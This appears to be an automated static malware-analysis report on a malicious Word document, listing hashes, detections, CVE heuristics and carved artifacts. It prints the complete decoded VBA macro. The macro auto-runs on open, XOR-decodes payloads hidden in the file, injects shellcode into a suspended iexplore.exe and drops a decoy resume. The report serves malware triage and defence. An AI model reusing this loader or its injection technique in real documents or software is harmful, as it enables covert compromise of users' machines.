Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d132b3929c445519…

MALICIOUS

Office (OLE)

424.0 KB Created: 2019-02-20 20:27:00 Authoring application: Microsoft Office Word First seen: 2019-12-10
MD5: 2eec77bc74ebccdda065d0a97dbd11ff SHA-1: 2b763d09a21e0b38d206122e3de3615c739a3fd8 SHA-256: d132b3929c445519117253941c67f7c968836b34f0e85b44e61eb51559797e85
508 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages CVE-2007-3899, a memory corruption vulnerability, to achieve code execution. The VBA macros contain calls to WinAPI functions such as CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, indicating the likely intent to inject and execute a second-stage payload. The presence of XOR-encoded strings and embedded OLE packages further supports this malicious behavior.

Heuristics 16

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.Injection-6355574-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • XOR-encoded strings (key 0x5A) critical SC_XOR_ENCODED
    Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
    Disassembly
    Attempted x86 opcode disassembly
    0003C635  1b1e              sbb ebx, dword ptr [esi]
    0003C637  0c1b              or al, 0x1b
    0003C639  0a13              or dl, byte ptr [ebx]
    0003C63B  6968741e16165a    imul ebp, dword ptr [eax + 0x74], 0x5a16161e
    0003C642  5a                pop edx
    0003C643  5a                pop edx
    0003C644  5a                pop edx
    0003C645  3939              cmp dword ptr [ecx], edi
    0003C647  295a0f            sub dword ptr [edx + 0xf], ebx
    0003C64A  0e                push cs
    0003C64B  1c77              sbb al, 0x77
    0003C64D  625a5a            bound ebx, qword ptr [edx + 0x5a]
    0003C650  5a                pop edx
    0003C651  0f0e              femms
    0003C653  1c77              sbb al, 0x77
    0003C655  6b6c161f5a        imul ebp, dword ptr [esi + edx + 0x1f], 0x5a
    0003C65A  5a                pop edx
    0003C65B  5a                pop edx
    0003C65C  5a                pop edx
    0003C65D  0f1413            unpcklps xmm2, xmmword ptr [ebx]
    0003C660  19151e1f5a1d      sbb dword ptr [0x1d5a1f1e], edx
    0003C666  3f                aas
    0003C667  2e0a28            or ch, byte ptr cs:[eax]
    0003C66A  35393f2929        xor eax, 0x29293f39
    0003C66F  0d33343e35        or eax, 0x353e3433
    0003C674  2d092e3b2e        sub eax, 0x2e3b2e09
    0003C679  3335345a1d3f      xor esi, dword ptr [0x3f1d5a34]
    0003C67F  2e0f293f          movaps xmmword ptr cs:[edi], xmm7
    0003C683  281538303f39      sub byte ptr [0x393f3038], dl
    0003C689  2e13343c          adc esi, dword ptr cs:[esp + edi]
    0003C68D  3528373b2e        xor eax, 0x2e3b3728
    0003C692  33                .byte 0x33
    0003C693  35                .byte 0x35
    0003C694  34                .byte 0x34
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Dim zuyEUBwvBu
      Set zuyEUBwvBu = CreateObject("ADODB.Stream")
      zuyEUBwvBu.Type = tGokxOkxcj
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
        cnKxRQHXdMtg
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
    Sub Workbook_Open()
        cnKxRQHXdMtg
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        If Len(Environ("ProgramW6432")) > 0 Then
            FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9300 bytes
SHA-256: f2abc6d250de8e3c9503849bf486c7e64fce4f2638bab40cf45f445f7419f808
Detection
ClamAV: No threats found
Obfuscation or payload: likely
85 of 148 identifiers look randomly generated (e.g. 'mTPHtgtuhhCgfAy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const tGokxOkxcj = 1
Const yfCpjuXVzi = 1, iBjNEmtJSn = 2, lFYZvNmnEd = 8

Private Type svkHMGtJfRvA
    xNgghSwGIXgF As Long
    XHETiRnOIOTr As Long
    hudVNHMplvpl As Long
    AuYDBxxPUELV As Long
End Type

Private Type rpdlqsAizKtR
    SBENpOaCqhhT As Long
    WHZRpTmGGnPR As String
    qekmUCkgSkyu As String
    EtVlgTegaphC As String
    MuWNfBuxTIKO As Long
    kCPbmbwkSBdb As Long
    fQsifyyrXPdT As Long
    qpoykOvyKNlO As Long
    xSbPQJFMSNnk As Long
    xhCLBvXlTTBX As Long
    gbMFBYRIuTmm As Long
    eKsOfUYZlaxk As Long
    oVTwfSdSyATN As Integer
    XXqDiKTLeGYE As Integer
    MrjbyoXieMAh As Long
    RrBTbvECxWMh As Long
    lifIeTJZPfoI As Long
    YRdthPyABufO As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As LongPtr, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As LongPtr
    Private Declare PtrSafe Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As LongPtr
    Private Declare PtrSafe Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As LongPtr, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As LongPtr) As LongPtr
    Private Declare PtrSafe Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal VdWOpNntkPgY As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#Else
    Private Declare Function QDamTkzkAwhS Lib "kernel32" Alias "CreateRemoteThread" (ByVal xNgghSwGIXgF As Long, ByVal TajfSOaKlyNY As Long, ByVal WFrDkJWopAAu As Long, ByVal aHPNjOVYjkuM As Long, lkWWlrzfrQEm As Long, ByVal kvhzubhmnhWR As Long, gbZhsnRhDAQp As Long) As Long
    Private Declare Function ccutHHdLbTqJ Lib "kernel32" Alias "VirtualAllocEx" (ByVal xNgghSwGIXgF As Long, ByVal umYidabmijQF As Long, ByVal IujFJfXjikKg As Long, ByVal BgvrdYSrgMIR As Long, ByVal pQWmkZNmndbJ As Long) As Long
    Private Declare Function lZilpIMnjQTS Lib "kernel32" Alias "WriteProcessMemory" (ByVal xNgghSwGIXgF As Long, ByVal JuXAZvbcweZx As Long, ByRef grtthSmGAjUH As Any, ByVal TTFtmycujLLf As Long, ByVal ZwYvgKNVdsYI As Long) As Long
    Private Declare Function vZwPvAkhtkWb Lib "kernel32" Alias "CreateProcessA" (ByVal LffCPosmfmNr As String, ByVal ZbSSuGCANMdK As String, FFTIpglXlMOq As Any, TajfSOaKlyNY As Any, ByVal NVmhoReoXByi As Long, ByVal kvhzubhmnhWR As Long, BIFeEDvHwjoq As Any, ByVal lpCurrentDriectory As String, FJBijcbHUOSC As rpdlqsAizKtR, kUTSBPrFPsHR As svkHMGtJfRvA) As Long
#End If

Sub cnKxRQHXdMtg()
    Dim ORaPXCWnNLMe As Long, DEJUdyWdRzJp As Variant, DTPNyTaCSmtl As Long
    Dim POVFbElAqElk As svkHMGtJfRvA
    Dim AtOshUIkSfgE As rpdlqsAizKtR
    Dim fsIvNhSPRjJW As String
    Dim FZTUWHNdxNIa As String
    Dim bPIWbDKsDK As String
    Dim XdRGLKEqmF() As Byte
    Dim UCFZKhmEEi As Boolean
    
#If VBA7 Then
    Dim rWuHUgktEqbX As LongPtr, fddzPhSPliSJ As LongPtr
#Else
    Dim rWuHUgktEqbX As Long, fddzPhSPliSJ As Long
#End If
    DEJUdyWdRzJp = hmlhxkqg

    If Len(Environ("ProgramW6432")) > 0 Then
        FZTUWHNdxNIa = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
    Else
        FZTUWHNdxNIa = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
    End If

    fddzPhSPliSJ = vZwPvAkhtkWb(fsIvNhSPRjJW, FZTUWHNdxNIa, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, fsIvNhSPRjJW, AtOshUIkSfgE, POVFbElAqElk)

    rWuHUgktEqbX = ccutHHdLbTqJ(POVFbElAqElk.xNgghSwGIXgF, 0, UBound(DEJUdyWdRzJp), &H1000, &H40)
    For DTPNyTaCSmtl = LBound(DEJUdyWdRzJp) To UBound(DEJUdyWdRzJp)
        ORaPXCWnNLMe = DEJUdyWdRzJp(DTPNyTaCSmtl)
        fddzPhSPliSJ = lZilpIMnjQTS(POVFbElAqElk.xNgghSwGIXgF, rWuHUgktEqbX + DTPNyTaCSmtl, ORaPXCWnNLMe, 1, ByVal 0&)
    Next DTPNyTaCSmtl
    fddzPhSPliSJ = QDamTkzkAwhS(POVFbElAqElk.xNgghSwGIXgF, 0, 0, rWuHUgktEqbX, 0, 0, 0)
    
    bPIWbDKsDK = Environ("TEMP") & "\Resume (2).doc"
    XdRGLKEqmF = vdtevtae
    UCFZKhmEEi = KsbcuZbpzm(bPIWbDKsDK, XdRGLKEqmF)
    
    Set temp = ActiveDocument
    Documents.Open (bPIWbDKsDK)
    temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub

Function KsbcuZbpzm(rASJJubWmd, AtWCTjfzjw)
  Dim zuyEUBwvBu
  Set zuyEUBwvBu = CreateObject("ADODB.Stream")
  zuyEUBwvBu.Type = tGokxOkxcj

  zuyEUBwvBu.Open
  zuyEUBwvBu.Write AtWCTjfzjw

  zuyEUBwvBu.SaveToFile rASJJubWmd, iBjNEmtJSn
End Function

Sub AutoOpen()
    cnKxRQHXdMtg
End Sub
Sub Workbook_Open()
    cnKxRQHXdMtg
End Sub


Function hmlhxkqg() As Byte()
    Dim hcCzdOOBNPoQmAw() As Byte
    Dim mTPHtgtuhhCgfAy As Long
    Dim VaegvWOIekAOUFD(7) As Byte
    Dim DTPNyTaCSmtl As Long
    Dim PdihewuviArgiTP() As Byte
    Dim UCFZKhmEEi As Boolean
    
    hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
    mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
    
    
        VaegvWOIekAOUFD(0) = 89
    
        VaegvWOIekAOUFD(1) = 68
    
        VaegvWOIekAOUFD(2) = 88
    
        VaegvWOIekAOUFD(3) = 82
    
        VaegvWOIekAOUFD(4) = 81
    
        VaegvWOIekAOUFD(5) = 78
    
        VaegvWOIekAOUFD(6) = 70
    
        VaegvWOIekAOUFD(7) = 73

    
    DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
    PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 212481 - 1)
    UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
    
    hmlhxkqg = PdihewuviArgiTP
End Function

Function vdtevtae() As Byte()
    Dim hcCzdOOBNPoQmAw() As Byte
    Dim mTPHtgtuhhCgfAy As Long
    Dim VaegvWOIekAOUFD(7) As Byte
    Dim DTPNyTaCSmtl As Long
    Dim PdihewuviArgiTP() As Byte
    Dim UCFZKhmEEi As Boolean
    
    hcCzdOOBNPoQmAw = IEXWPMPhCY(ActiveDocument.FullName)
    mTPHtgtuhhCgfAy = KMbsvKCbcv(hcCzdOOBNPoQmAw)
    
    
        VaegvWOIekAOUFD(0) = 79
    
        VaegvWOIekAOUFD(1) = 83
    
        VaegvWOIekAOUFD(2) = 84
    
        VaegvWOIekAOUFD(3) = 86
    
        VaegvWOIekAOUFD(4) = 88
    
        VaegvWOIekAOUFD(5) = 79
    
        VaegvWOIekAOUFD(6) = 90
    
        VaegvWOIekAOUFD(7) = 86

    
    DTPNyTaCSmtl = lmiXHsJtIc(hcCzdOOBNPoQmAw, VaegvWOIekAOUFD)
    PdihewuviArgiTP = OdxXAAOyHk(hcCzdOOBNPoQmAw, DTPNyTaCSmtl + KMbsvKCbcv(VaegvWOIekAOUFD), 91368 - 1)
    UCFZKhmEEi = vYtGxWFzfz(PdihewuviArgiTP, KMbsvKCbcv(PdihewuviArgiTP))
    
    vdtevtae = PdihewuviArgiTP
End Function

Function KMbsvKCbcv(abArray() As Byte) As Long
    Dim nLen As Long
    KMbsvKCbcv = UBound(abArray) - LBound(abArray) + 1
End Function

Function IEXWPMPhCY(WIdavqNInj As String)
    Dim fqQEZtmCAY() As Byte
    Dim hLLoHruxpI As Integer: hLLoHruxpI = FreeFile
    
    Open WIdavqNInj For Binary Access Read As #hLLoHruxpI
    ReDim fqQEZtmCAY(0 To LOF(hLLoHruxpI) - 1)
    Get #hLLoHruxpI, , fqQEZtmCAY
    Close #hLLoHruxpI
    
    IEXWPMPhCY = fqQEZtmCAY
End Function

Function lmiXHsJtIc(yRAUzytyxg() As Byte, InSWDbVSQV() As Byte) As Long
    Dim JtlPFmtZxb As Boolean
    Dim XvfafqmCwl As Long
    Dim KhcWWSjSzH As Long
    Dim NfjyhACega As Long
    Dim HZBcGDGTdi As Long
    
    JtlPFmtZxb = False
    NfjyhACega = KMbsvKCbcv(yRAUzytyxg)
    HZBcGDGTdi = KMbsvKCbcv(InSWDbVSQV)
    For XvfafqmCwl = 0 To NfjyhACega
        JtlPFmtZxb = True
        For KhcWWSjSzH = 0 To HZBcGDGTdi - 1
                If yRAUzytyxg(XvfafqmCwl + KhcWWSjSzH) <> InSWDbVSQV(KhcWWSjSzH) Then
                    JtlPFmtZxb = False
                    Exit For
                End If
        Next KhcWWSjSzH
        If JtlPFmtZxb = True Then
            Exit For
        End If
    Next XvfafqmCwl
    
    If JtlPFmtZxb = False Then
        lmiXHsJtIc = -1
    Else
        lmiXHsJtIc = XvfafqmCwl
    End If
    
End Function

Function OdxXAAOyHk(yRAUzytyxg() As Byte, CZAMdvjYTR As Long, yOCftnDOtp As Long) As Byte()
    Dim XJZLYcxXxl() As Byte
    Dim XvfafqmCwl As Long

    For XvfafqmCwl = 0 To yOCftnDOtp
        ReDim Preserve XJZLYcxXxl(XvfafqmCwl)
        XJZLYcxXxl(XvfafqmCwl) = yRAUzytyxg(CZAMdvjYTR + XvfafqmCwl)
    Next XvfafqmCwl
    
    OdxXAAOyHk = XJZLYcxXxl
End Function

Function vYtGxWFzfz(DTuPXKmgaH() As Byte, yOCftnDOtp As Long)
    
    Dim XexIxXIqPo As Byte
    Dim RmhahkOqfk As Long
    XexIxXIqPo = 90
    
    For RmhahkOqfk = 0 To yOCftnDOtp - 1
        DTuPXKmgaH(RmhahkOqfk) = DTuPXKmgaH(RmhahkOqfk) Xor XexIxXIqPo
    Next RmhahkOqfk
    
End Function
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1612170789/Ole10Native 91842 bytes
SHA-256: 684512f174a335f854fdbad1e66292baad0f362863d3b314dad8bd4a68b753a7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.92, consistent with packed or encrypted content.
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_1612170790/Ole10Native 212955 bytes
SHA-256: 17cf52f85bc83040e8eb6559205231c0c10e971a23863663330a61f4a2c1caf9